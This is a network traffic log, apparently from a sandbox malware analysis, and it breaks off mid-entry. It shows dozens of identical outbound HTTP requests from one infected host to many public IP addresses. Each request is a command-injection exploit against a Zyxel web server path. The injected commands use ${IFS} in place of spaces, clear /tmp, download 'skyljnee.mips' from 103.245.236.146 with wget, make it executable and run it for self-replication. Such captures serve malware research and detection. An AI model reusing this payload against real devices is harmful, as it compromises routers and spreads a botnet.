                                                            426192.168.2.133615238.49.71.65443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:18.498330116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            427192.168.2.1349648199.91.21.247443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:18.498343945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            428192.168.2.135939868.158.100.200443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:18.498402119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            429192.168.2.134207683.131.249.238443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:18.498423100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            430192.168.2.1348452149.40.21.21443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:18.498445034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            431192.168.2.135146836.25.176.145443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:18.498578072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            432192.168.2.1338026114.142.202.245443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:18.498617887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            433192.168.2.134327831.163.40.202443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:19.502692938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            434192.168.2.1348158201.4.138.174443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:19.502747059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            435192.168.2.1337388193.0.245.242443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:19.502764940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            436192.168.2.134911259.6.195.149443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:19.502816916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            437192.168.2.133811683.130.13.35443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:19.502836943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            438192.168.2.1341918157.226.36.134443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:19.502944946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            439192.168.2.135096046.82.214.38443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:19.502945900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            440192.168.2.1356044145.30.41.168443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:19.503051996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            441192.168.2.1346660184.8.77.84443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:19.503073931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            442192.168.2.133393640.0.182.144443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:19.503073931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            443192.168.2.1351248217.228.136.22443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:20.506778955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            444192.168.2.133949487.9.122.144443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:20.506788969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            445192.168.2.1334826196.67.115.222443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:20.506834984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            446192.168.2.135391879.87.193.144443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:20.506865978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            447192.168.2.1359288182.156.184.202443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:20.506933928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            448192.168.2.1333500186.48.11.197443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:20.506933928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            449192.168.2.1345762219.222.98.138443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:20.506939888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            450192.168.2.1347530134.7.33.196443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:20.506985903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            451192.168.2.1346188131.195.43.180443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:20.507081985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            452192.168.2.1340800210.247.252.147443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:20.507086039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            453192.168.2.1359654212.149.114.230443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:20.507131100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            454192.168.2.136065449.33.163.143443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:20.507200003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            455192.168.2.133565618.220.51.156443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:20.507256985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            456192.168.2.1354818111.119.104.198443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:21.510777950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            457192.168.2.135810281.146.132.237443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:21.510809898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            458192.168.2.133789639.136.52.222443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:21.510840893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            459192.168.2.1339156164.163.221.14443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:21.510869980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            460192.168.2.1339014176.136.105.139443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:21.510912895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            461192.168.2.1346702100.38.185.198443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:21.510938883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            462192.168.2.1347458126.95.67.166443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:21.510970116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            463192.168.2.133837260.225.15.214443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:21.511063099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            464192.168.2.1348470213.17.95.111443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:21.511094093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            465192.168.2.135022420.133.137.47443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:21.511132956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            466192.168.2.1357990129.73.149.148443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:21.511154890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            467192.168.2.1348200174.222.63.210443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:22.515010118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            468192.168.2.133669672.83.65.193443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:22.515038967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            469192.168.2.133448485.19.67.226443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:22.515079975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            470192.168.2.1340182146.26.28.244443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:22.515096903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            471192.168.2.133437064.208.72.3443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:22.515151978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            472192.168.2.1333318168.40.22.35443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:22.515151978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            473192.168.2.136081482.24.176.86443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:22.515259981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            474192.168.2.135003489.116.227.202443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:22.515280008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            475192.168.2.135302474.235.148.109443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:22.515280008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            476192.168.2.1334450193.164.172.38443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:22.515294075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            477192.168.2.134482675.7.17.216443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:22.515345097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            478192.168.2.1333942116.71.32.91443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:22.515389919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            479192.168.2.1354944208.132.18.181443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:22.515456915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            480192.168.2.1348582102.248.42.83443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:22.515456915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            481192.168.2.1337708143.25.113.149443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:22.515522957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            482192.168.2.1334458155.192.67.192443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:22.515578032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            483192.168.2.1338998119.124.116.171443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:22.515582085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            484192.168.2.1354792205.247.55.29443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:22.515578985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            485192.168.2.136075219.117.10.102443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:22.515641928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            486192.168.2.135285483.214.98.58443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:22.515665054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            487192.168.2.134909232.91.77.169443
                                                            TimestampBytes transferredDirectionData
